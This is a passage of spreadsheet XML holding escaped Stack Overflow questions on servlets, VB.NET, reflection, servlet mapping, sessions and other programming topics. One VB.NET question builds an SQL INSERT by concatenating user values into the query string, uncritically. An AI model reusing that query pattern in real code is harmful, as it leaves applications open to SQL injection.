&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the corresponding javascript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; function submitToServlet(newAction)
 {
   document.userGameForm.action = newAction;
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like the servlet to have access to userBean&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;jsp:useBean id = "userBean" scope = "session" class = "org.project.User" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Getting a sqlexception on successful insert, VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to do a very simple INSERT using VB.NET.  For some reason I'm getting a SqlException on every insert though.  The data is inserted, but still get the following: &lt;/p&gt;
&lt;p&gt;Violation of PRIMARY KEY constraint 'PK_User'. Cannot insert duplicate key in object 'dbo.Employee'. The statement has been terminated&lt;/p&gt;
&lt;p&gt;When I check in SQL Management Studio, the data is succesfully inserted.&lt;/p&gt;
&lt;p&gt;Here is the code where the problem is happening&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Try
    conn.Open()
    Dim insertSQL As String = "insert into Employee(uName, firstName, lastName,
        On_Switch, On_Phone) " + "values('" &amp;amp; uName &amp;amp; "', '" &amp;amp; firstName &amp;amp; "', '" _
        &amp;amp; lastName &amp;amp; "', '" &amp;amp; onSwitch &amp;amp; "', '" &amp;amp; onPhone &amp;amp; "')"
        Dim AddCom As SqlCommand = New SqlCommand(insertSQL, conn)
        If (AddCom.ExecuteNonQuery() = 1) Then
            lblError.Text = "User Added."
            ' string urlBack = "../ViewAsset.aspx?DeptID=" + DeptID;
            ' Response.Redirect(urlBack);
        End If
        conn.Close()
    Catch ex As SqlException
        Dim ExMsg As String = ex.Message.ToString()
        lblError.Text = ExMsg
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I went back and tested the same code in C# and there is no Exception thrown.  It seems to be something small I'm doing in VB, but I'm lost as to what it is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash Logging API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a good (AS3) logging API for Flash/AIR/Flex?  I need something to capture and record mouse and keyboard events in addition to coded events.  Preferably something well documented/supported. Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can anyone explain servlet mapping?</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;p&gt;I'm trying to write a web application using SpringMVC. Normally I'd just map some made-up file extension to Spring's front controller and live happily, but this time I'm going for REST-like URLs, with no file-name extensions.&lt;/p&gt;
&lt;p&gt;Mapping everything under my context path to the front controller (let's call it "&lt;strong&gt;app&lt;/strong&gt;") means I should take care of static files also, something I'd rather not do (why reinvent yet another weel?), so some combination with tomcat's default servlet (let's call it "&lt;strong&gt;tomcat&lt;/strong&gt;") appears to be the way to go.&lt;/p&gt;
&lt;p&gt;I got the thing to work doing something like &lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;servlet-mapping&amp;gt;
  &amp;lt;servlet-name&amp;gt;app&amp;lt;/servlet-name&amp;gt;
  &amp;lt;url-pattern&amp;gt;/&amp;lt;/url-pattern&amp;gt;
&amp;lt;/servlet-mapping&amp;gt;
&amp;lt;servlet-mapping&amp;gt;
  &amp;lt;servlet-name&amp;gt;tomcat&amp;lt;/servlet-name&amp;gt;
  &amp;lt;url-pattern&amp;gt;*.ext&amp;lt;/url-pattern&amp;gt;
&amp;lt;/servlet-mapping&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and repeating the latter for each one of the file extensions of my static content. I'm just wondering why the following setups, which to me are equivalent to the one above, don't work.&lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;!-- failed attempt #1 --&amp;gt;
&amp;lt;servlet-mapping&amp;gt;
  &amp;lt;servlet-name&amp;gt;app&amp;lt;/servlet-name&amp;gt;
  &amp;lt;url-pattern&amp;gt;/*&amp;lt;/url-pattern&amp;gt;
&amp;lt;/servlet-mapping&amp;gt;
&amp;lt;servlet-mapping&amp;gt;
  &amp;lt;servlet-name&amp;gt;tomcat&amp;lt;/servlet-name&amp;gt;
  &amp;lt;url-pattern&amp;gt;*.ext&amp;lt;/url-pattern&amp;gt;
&amp;lt;/servlet-mapping&amp;gt;
&amp;lt;!-- failed attempt #2 --&amp;gt;
&amp;lt;servlet-mapping&amp;gt;
  &amp;lt;servlet-name&amp;gt;app&amp;lt;/servlet-name&amp;gt;
  &amp;lt;url-pattern&amp;gt;/&amp;lt;/url-pattern&amp;gt;
&amp;lt;/servlet-mapping&amp;gt;
&amp;lt;servlet-mapping&amp;gt;
  &amp;lt;servlet-name&amp;gt;tomcat&amp;lt;/servlet-name&amp;gt;
  &amp;lt;url-pattern&amp;gt;/some-static-content-folder/*&amp;lt;/url-pattern&amp;gt;
&amp;lt;/servlet-mapping&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone shed some light?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does Telnet server communicate to the client?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write a C# application where it connects to a telnet server and communicates to the server. I was wondering how a telnet server sends information to the client. I have looked (skimmed) over the &lt;a href="http://www.faqs.org/rfcs/rfc854.html" rel="nofollow"&gt;Telnet RFC&lt;/a&gt; and looked at the incoming packets coming in from the server and still a bit confused. Can somebody give me an example how the server moves the cursor around in the telnet client and how it can change colors of characters? (An example would be most appreciated)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update I&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here's some additional VT100 resources:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="http://graphcomp.com/info/specs/ansi%5Fcol.html" rel="nofollow"&gt;ANSI/VT100 Terminal Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.cs.utk.edu/~shuford/terminal/vt100%5Fcodes%5Fnews.txt" rel="nofollow"&gt;vt100_codes_news.txt&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Update II&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;With much research and time, here what I found out: &lt;a href="http://srand2.blogspot.com/2009/02/telnet-programming-with-c.html" rel="nofollow"&gt;Telnet Programming with C#&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BindingFlags for Type.GetMethods excluding property accesors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I've got the following program:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace ReflectionTest
{
    public class Example
    {
        private string field;
        public void MethodOne() { }
        public void MethodTwo() { }
        public string Property
        {
            get { return field; }
            set { this.field = value; }
        }
    }
    class Program
    {
        static void Main(string[] args)
        {
            iterate(typeof(Example));
            Console.ReadLine();
        }
        public static void iterate(Type type)
        {
            MethodInfo[] methods = type.GetMethods(
                BindingFlags.DeclaredOnly |
                BindingFlags.Instance |
                BindingFlags.Public);
            foreach (MethodInfo mi in methods)
            {
                Console.WriteLine(mi.Name);
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run the program I'm getting the following output:&lt;/p&gt;
&lt;pre&gt;MethodOne
MethodTwo
get_Property
set_Property&lt;/pre&gt;
&lt;p&gt;I want to skip the property accesor methods. I've tried with different &lt;a href="http://msdn.microsoft.com/en-us/library/system.reflection.bindingflags.aspx"&gt;&lt;code&gt;BindingFlags&lt;/code&gt;&lt;/a&gt;, for instance, &lt;code&gt;~BindingFlags.SetProperty&lt;/code&gt;, but with no luck. At the moment the only way I've found to skip those methods is rewriting the iterate function to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static void iterate(Type type)
{
    MethodInfo[] methods = type.GetMethods(
        BindingFlags.DeclaredOnly |
        BindingFlags.Instance |
        BindingFlags.Public);
    foreach (MethodInfo mi in methods)
    {
        if (mi.IsSpecialName) continue;
        Console.WriteLine(mi.Name);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do you know what &lt;code&gt;BindingFlags&lt;/code&gt; should I use?&lt;/p&gt;
&lt;p&gt;Thank you very much.&lt;/p&gt;
&lt;h3&gt;Update:&lt;/h3&gt;
&lt;p&gt;Well, I should have explained that the project is actually for building automatically templates for unit testing, so I can skip all the special methods. Thanks for the additional information on IsSpecialName :)&lt;/p&gt;
&lt;p&gt;LINQ? Really? Wow. Anyway, this project is .NET 2.0 so LINQ is (sadly) not an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Skip Lists -- ever used them?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering whether anyone here has ever used a &lt;a href="http://en.wikipedia.org/wiki/Skip_list"&gt;skip list&lt;/a&gt;. It looks to have roughly the same advantages as a balanced binary tree, but is simpler to implement. If you have, did you write your own, or use a pre-written library (and if so, what was its name)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>One DB per developer or not?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a corporate development environment writing mostly administrative software, should every developer use their own database instance, or should they use a central database instance during development? What are the advantages and disadvantages of each approach? What about other environments and other products?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Solving the shared-server security problem for Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So my group is trying to set up a shared-server environment for various and sundry web services.  I think we've settled on setting &lt;code&gt;disable_functions&lt;/code&gt; and &lt;code&gt;disable_classes&lt;/code&gt; site wide in &lt;code&gt;php.ini&lt;/code&gt; and &lt;code&gt;php_admin_value&lt;/code&gt; to force &lt;code&gt;open_basedir&lt;/code&gt; in each app's &lt;code&gt;httpd.conf&lt;/code&gt;
 for php scripts, and passenger's &lt;a href="http://www.modrails.com/documentation/Users%20guide.html#user_switching" rel="nofollow"&gt;user switching&lt;/a&gt; for ruby scripts.  &lt;/p&gt;
&lt;p&gt;We still need to find something for python though.  Passenger does support python, but not for per-application security for specific sub-directories (it's all or nothing at the domain level).  &lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;(And if any of the previous doesn't make sense - well, I'm the guy who's supposed to set up the python support, not the guy who set up the php or ruby support, so there's still some "and then some magic happens" steps in there from my perspective).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use Class.newInstance() with constructor arguments?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use &lt;code&gt;Class.newInstance()&lt;/code&gt; but the class I am instantiating does not have a nullary constructor. Therefore I need to be able to pass in constructor arguments. Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which method name fits in best with Objective-C/Cocoa conventions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's a quicky question. Which method name makes the most sense for an Objective-C Cocoa application?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-(void) doSomethingWithAnimation:(BOOL)animated
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-(void) doSomething:(BOOL)animated
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or even:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-(void) doSomethingAnimated:(BOOL)animated
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Weird case sensitivity bug in Class.getResource?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was loading an image resource with the following code and it works fine from my dev environment (netbeans) but threw an exception as soon as it ran from the desktop.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new ImageIcon(Images.class.getResource("images/highlighter24.gif"));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I traced it down to my file having different case than in the code.&lt;/p&gt;
&lt;p&gt;Fine, my bad, but why the inconsistent behavior?&lt;/p&gt;
&lt;p&gt;Gremlins?&lt;/p&gt;
&lt;p&gt;Note: I'm running on windows before you ask.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sending emails with the error log through CruiseControl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you configure cruiseControl to send out emails that contains the error log whenever a build fails?  I've gotten it to send out emails to users when the build fails, but it does not include the actual error that caused the build to fail.  I know that if I only configure it to send out emails to the users that have made modifications, the error log is included in those emails.  This is a sample of what I have:&lt;/p&gt;
&lt;p&gt;&amp;lt; publishers&gt;&lt;br/&gt;
   &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;lt; rss/&gt;&lt;br/&gt;
   &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;lt; xmllogger/&gt; &lt;br/&gt;
   &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;lt; email from="abc@abc.com" mailhost="abc.abc.com" includeDetails="TRUE"&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;
        &amp;lt; users&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
           &amp;lt; user name="Joe" group="devs" address="joe@abc.com"/&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
           &amp;lt; user name="Jim" group="devs" address="jim@abc.com"/&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;
        &amp;lt; /users&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;
        &amp;lt; groups&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
           &amp;lt; group name="devs" notification="Failed"/&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;
        &amp;lt; /groups&gt;&lt;br/&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;
   &amp;lt; /email&gt;&lt;br/&gt;
&amp;lt; /publishers&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the UITableView index magnifying glass character?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Apple's iPhone apps (like Contacts), they have a nice magnifying glass icon at the top of the table view index. Since the table view index API is character-based, I assume that this magnifying glass is a Unicode character. So far I've resorted to placing a question mark character there, but that looks lame.&lt;/p&gt;
&lt;p&gt;Can anyone tell me what character the magnifying glass is?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>General Business Object Practices (and exception errors - redux)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently, &lt;a href="http://stackoverflow.com/questions/204814/is-there-any-valid-reason-to-ever-ignore-a-caught-exception"&gt;I made a post about the developers I'm working with not using try catch blocks properly&lt;/a&gt;, and unfortuantely using try... catch blocks in critical situations and ignoring the exception error all together.  causing me major heart ache. Here is an example of one of the several thousand sections of code that they did this (some code left out that doesn't particuarly matter:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void AddLocations(BOLocation objBllLocations)
{
    try
    {
        dbManager.Open();
        if (objBllLocations.StateID != 0)
        {
             // about 20 Paramters added to dbManager here
        }
        else
        {
           // about 19 Paramters added here
        }
        dbManager.ExecuteNonQuery(CommandType.StoredProcedure, "ULOCATIONS.AddLocations");
    }
    catch (Exception ex)
    {
    }
    finally
    {
        dbManager.Dispose();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is absolutely discusting, in my eyes, and does not notify the user in case some potential problem occurred. I know many people say that OOP is evil, and that adding multiple layers adds to the number of lines of code and to the complexity of the program, leading to possible issues with code maintainence.  Much of my programming background, I personally, have taken almost the same approach in this area. Below I have listed out a basic structure of the way I normally code in such a situation, and I've been doing this accross many languages in my career, but this particular code is in C#.  But the code below is a good basic idea of how I use the Objects, it seems to work for me, but since this is a good source of some fairly inteligent programming mines, I'd like to know If I should re-evaluate this technique that I've used for so many years.  Mainly, because, in the next few weeks, i'm going to be plunging into the not so good code from the outsourced developers and modifying huge sections of code.  i'd like to do it as well as possible.  sorry for the long code reference. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// *******************************************************************************************
/// &amp;lt;summary&amp;gt;
/// Summary description for BaseBusinessObject
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;remarks&amp;gt;
/// Base Class allowing me to do basic function on a Busines Object
/// &amp;lt;/remarks&amp;gt;
public class BaseBusinessObject : Object, System.Runtime.Serialization.ISerializable
{
    public enum DBCode
    {   DBUnknownError,
        DBNotSaved,
        DBOK
    }
    // private fields, public properties
    public int m_id = -1;
    public int ID { get { return m_id; } set { m_id = value; } }
    private int m_errorCode = 0;
    public int ErrorCode { get { return m_errorCode; } set { m_errorCode = value; } }
    private string m_errorMsg = "";
    public string ErrorMessage { get { return m_errorMsg; } set { m_errorMsg = value; } }
    private Exception m_LastException = null;
    public Exception LastException { get { return m_LastException; } set { m_LastException = value;} }
    //Constructors
    public BaseBusinessObject()
    {
        Initialize();
    }
    public BaseBusinessObject(int iID)
    {
        Initialize();
        FillByID(iID);
    }
    // methods
    protected void Initialize()
    {
        Clear();
        Object_OnInit();
        // Other Initializable code here
    }
    public void ClearErrors()
    {
        m_errorCode  = 0; m_errorMsg = ""; m_LastException = null;
    }
    void System.Runtime.Serialization.ISerializable.GetObjectData(
         System.Runtime.Serialization.SerializationInfo info, 
        System.Runtime.Serialization.StreamingContext context)
    {
      //Serialization code for Object must be implemented here
    }
    // overrideable methods
    protected virtual void Object_OnInit()     
    {
        // User can override to add additional initialization stuff. 
    }
    public virtual BaseBusinessObject FillByID(int iID)
    {
        throw new NotImplementedException("method FillByID Must be implemented");
    }
    public virtual void Clear()
    {
        throw new NotImplementedException("method Clear Must be implemented");
    }
    public virtual DBCode Save()
    {
        throw new NotImplementedException("method Save Must be implemented");
    }
}
// *******************************************************************************************
/// &amp;lt;summary&amp;gt;
/// Example Class that might be based off of a Base Business Object
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;remarks&amp;gt;
/// Class for holding all the information about a Customer
/// &amp;lt;/remarks&amp;gt;
public class BLLCustomer : BaseBusinessObject
{
    // ***************************************
    // put field members here other than the ID
    private string m_name = "";
    public string Name { get { return m_name; } set { m_name = value; } }
    public override void Clear()
    {
        m_id = -1;
        m_name = "";
    }
    public override BaseBusinessObject FillByID(int iID)
    {
        Clear();
        try
        {
            // usually accessing a DataLayerObject, 
            //to select a database record
        }
        catch (Exception Ex)
        {
            Clear();
            LastException = Ex;
            // I can have many different exception, this is usually an enum
            ErrorCode = 3;
            ErrorMessage = "Customer couldn't be loaded";
        }
        return this;
    }
    public override DBCode Save()
    {
        DBCode ret = DBCode.DBUnknownError;
        try
        {
            // usually accessing a DataLayerObject, 
            //to save a database record
            ret = DBCode.DBOK;
        }
        catch (Exception Ex)
        {
            LastException = Ex;
            // I can have many different exception, this is usually an enum
            // i do not usually use just a General Exeption
            ErrorCode = 3;
            ErrorMessage = "some really weird error happened, customer not saved";
            ret = DBCode.DBNotSaved;
        }
        return ret;
    }
}
// *******************************************************************************************
// Example of how it's used on an asp page.. 
    protected void Page_Load(object sender, EventArgs e)
    {
        // Simplifying this a bit, normally, I'd use something like, 
        // using some sort of static "factory" method
        // BaseObject.NewBusinessObject(typeof(BLLCustomer)).FillByID(34);
        BLLCustomer cust = ((BLLCustomer)new BLLCustomer()).FillByID(34);
        if (cust.ErrorCode != 0)
        {
            // There was an error.. Error message is in 
            //cust.ErrorMessage
            // some sort of internal error code is in
            //cust.ErrorCode
            // Give the users some sort of message through and asp:Label.. 
            // probably based off of cust.ErrorMessage
            //log can be handled in the data, business layer... or whatever
            lab.ErrorText = cust.ErrorMessage;
        }
        else
        {
            // continue using the object, to fill in text boxes, 
            // literals or whatever. 
            this.labID = cust.ID.toString();
            this.labCompName = cust.Name;
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bottom line, my question is, Am I over complicating things with the muliple layers, and the inherited classes or is my old concept illustrated still working good and stable?  Is there a better way now a days to accomplish these things?  Should I go to just making straight SQL calls from the asp.net page code behind pages as fellow work associate developer suggested (though that last solution makes me feel icky), instead of going through a business object, and data layer (data layer not shown, but basically holds all the stored proc calls). Yeah, another developer did ask me why i go through the effort of layering things, when you can just type what you need straight in a *.aspx.cs code behind page, and then I can have the joys of over 1k lines of code behind. What is some advice here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the benefits of maintaining a "clean" list of using directives in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know VS2008 has the remove and sort function for cleaning up using directives, as does Resharper. Apart from your code being "clean" and removing the problem of referencing namespaces which might not exist in the future, what are the benefits of maintaining a "clean" list of using directives?&lt;/p&gt;
&lt;p&gt;Less code?
Faster compilation times?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there better clients for viewing System Monitor logs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a better GUI client for displaying Windows &lt;a href="http://support.microsoft.com/kb/248345" rel="nofollow"&gt;System Monitor&lt;/a&gt; log files? (System Monitor is sometimes called &lt;a href="http://support.microsoft.com/?kbid=330138" rel="nofollow"&gt;Performance Monitor&lt;/a&gt;.) I'm trying to track a long-term memory leak in a C# application running on Windows XP or 2K3 by comparing memory usages to run logs.&lt;/p&gt;
&lt;p&gt;Specifically I want a client that will allow me to see the following (because System Monitor is unable or difficult):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Specify exact date time ranges for viewing data (or at least finer granularity than hours)&lt;/li&gt;
&lt;li&gt;Show time intervals along the horizontal axis&lt;/li&gt;
&lt;li&gt;Show max, min, average for the time range&lt;/li&gt;
&lt;li&gt;Somewhere show the interval on which source data was captured  (1 sec, 5 min, etc.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(If no such thing exists I'm willing to hear recommendations for better long term performance/memory capturing tools.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I've done Google searches and haven't found anything except tutorials on how to create System Monitor logs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the scope of a function in Javascript/ECMAScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Today I had a discussion with a colleague about nested functions in Javascript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function a() {
   function b() {
      alert('boo')
   }
   var c = 'Bound to local call object.'
   d = 'Bound to global object.'
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example, trials point out that b is not reachable outside the body of a, much like c is. However, d is - after executing a(). Looking for the exact definition of this behaviour in the &lt;a href="http://www.ecma-international.org/publications/files/ECMA-ST/Ecma-262.pdf"&gt;ECMAScript v.3 standard &lt;/a&gt;, I didn't find the exact wording I was looking for; what Sec.13 p.71 does not say, is which object the function object created by the function declaration statement is to be bound to. Am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# How do I sort the columns in a datagrid into alphabetical order?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I sort the columns in a winforms datagrid control into alphabetical order?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to effectively implement sessions in GAE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering about implementing my own sessions (more for an exercise than anything else) for a GAE app I'm working ... at first I was thinking of using the datastore to store the session data. However, every time something needs to be added to the session 'bucket', it would require saving to the datastore. Obviously that's bad since we want to minimize our writes. Then I thought about using memcache ... seemed like a good idea but then we're faced with issues of possible session corruption due to memcache being "evicted through memory pressure" by Google. So does that mean we are left with only the following options:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Storing all session data in cookies&lt;/li&gt;
&lt;li&gt;Writing all session data to datastore and memcache, and then only reading from memcache&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Anyone have any other ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good FAQ For Recompiling apps with GCC for AmigaOS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are a couple of open source apps I am trying to recompile to work under amigaOS.  Can someone point me to a good step-by-step guide explaining what changes (from a rule-of-thumb standpoint) I need to make to the source before it'll compile?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you detect low memory situations within the java virtual machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been getting some OutOfMemory errors lately in my application. Is it possible to detect ahead of time when the virtual machine is running low on memory? In other words to preemptively deal with OutOfMemory errors before they actually occur?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can the overall implementation of a component be divided in two objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen with Microsoft COM and XPCOM, at least from what I've read and gathered so far, that the implementations of interfaces in a component have to essentially be in the single class that derives all the virtual interfaces. Is this correct? What am I missing?&lt;/p&gt;
&lt;p&gt;Is there a way to have multiple objects (possibly in separate DLL's) each provide their functionality and still be able to freely transition between them using QueryIterface?&lt;/p&gt;
&lt;p&gt;What I'm looking for is to have a component with some functionality, but still allow external client code to create new extensions of the component with (possibly) new interfaces. Ideally this should happen without divulging the current source of the component and its implementation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a concise catalog of variable naming-conventions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are many different styles of variable names that I've come across over the years.&lt;/p&gt;
&lt;p&gt;The current wikipedia entry on naming conventions is fairly light...  &lt;/p&gt;
&lt;p&gt;I'd love to see a concise catalog of variable naming-conventions, identifying it by a name/description, and some examples.  &lt;/p&gt;
&lt;p&gt;If a convention is particularly favored by a certain platform community, that would be worth noting, too.&lt;/p&gt;
&lt;p&gt;I'm turning this into a community wiki, so please create an answer for each convention, and edit as needed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to change SQL user-defined data type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch of tables using user-defined data type for PK column. Is it possible to change this type Using SQL Server 2005?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System.Windows.Forms.WebBrowser.Refresh showing previous page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My WinForms application has a tab with a &lt;code&gt;System.Windows.Forms.WebBrowser&lt;/code&gt; control. There are several controls that set the WebBrowser's &lt;code&gt;.Url&lt;/code&gt; property, and when the form repaints it calls the WebBrowser's &lt;code&gt;.Refresh(WebBrowserRefreshOption.Completely)&lt;/code&gt; method.&lt;/p&gt;
&lt;p&gt;Occasionally, however, the form gets repainted and the WebBrowser content doesn't change. I break on the &lt;code&gt;.Refresh( )&lt;/code&gt;, and the &lt;code&gt;.Url&lt;/code&gt; is the previous Url. What's going on?&lt;/p&gt;
&lt;p&gt;According to &lt;a href="http://msdn.microsoft.com/en-us/library/system.windows.forms.webbrowser.url.aspx" rel="nofollow"&gt;MSDN&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;If you set the value of this property and then immediately retrieve it again, the value retrieved may be different than the value set if the WebBrowser control has not had time to load the new document.&lt;/blockquote&gt;
&lt;p&gt;Well isn't that special? Why doesn't &lt;code&gt;.Refresh( )&lt;/code&gt; wait until the control has "had time to load the new document" before it redraws? Is there any way to force this to happen?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>F# int64 to int</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I convert an &lt;code&gt;Int64&lt;/code&gt; to an &lt;code&gt;Int32&lt;/code&gt; type in F# without using the &lt;code&gt;Microsoft.FSharp.Compatibility.Int32.of_int64&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;I'm doing this because interactive doesn't seem to work when I try:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;open Microsoft.FSharp.Compatibility
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;FSharp.PowerPack&lt;/code&gt; added as a reference it says: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;error FS0039: The namespace 'Compatibility' is not defined.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Does anyone have an answer to the question?  The suggestions about the int types are useful and informative, but I'm having the same issue opening the powerpack namespace in F# interactive.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make a function happen 50% of the time in vb6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Making a small app, and I want a function to execute 50% of the time.  So if I were to dbl click the exe half the time the function would execute, and the other half it wouldn't.  I can't seem to find anyway to easily do this, the one solution I tried seemed to determine the chance on compile rather than on run.  Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to lookup django session for a particular user?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing an application where I will be accessing the database from django and from a stand alone application. Both need to do session verification and the session should be the same for both of them. Django has a built in authentication/session verification, which is what I am using, now I need to figure out how to reuse the same session for my stand alone application.&lt;/p&gt;
&lt;p&gt;My question is how can I look up a session_key for a particular user?&lt;/p&gt;
&lt;p&gt;From what it looks there is nothing that ties together auth_user and django_session&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VistaDB Connection Issue Programmatically using SQLConnection and ConnectionString</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting an error connecting to a VistaDB using a connection string in the web.config file.&lt;/p&gt;
&lt;p&gt;It works fine using a SQLDataSource AFTER I specified the ProviderName. On another page I'm only connecting in code and &lt;/p&gt;
&lt;p&gt;&lt;em&gt;Here is the code for the connection string:&lt;/em&gt;&lt;/p&gt;
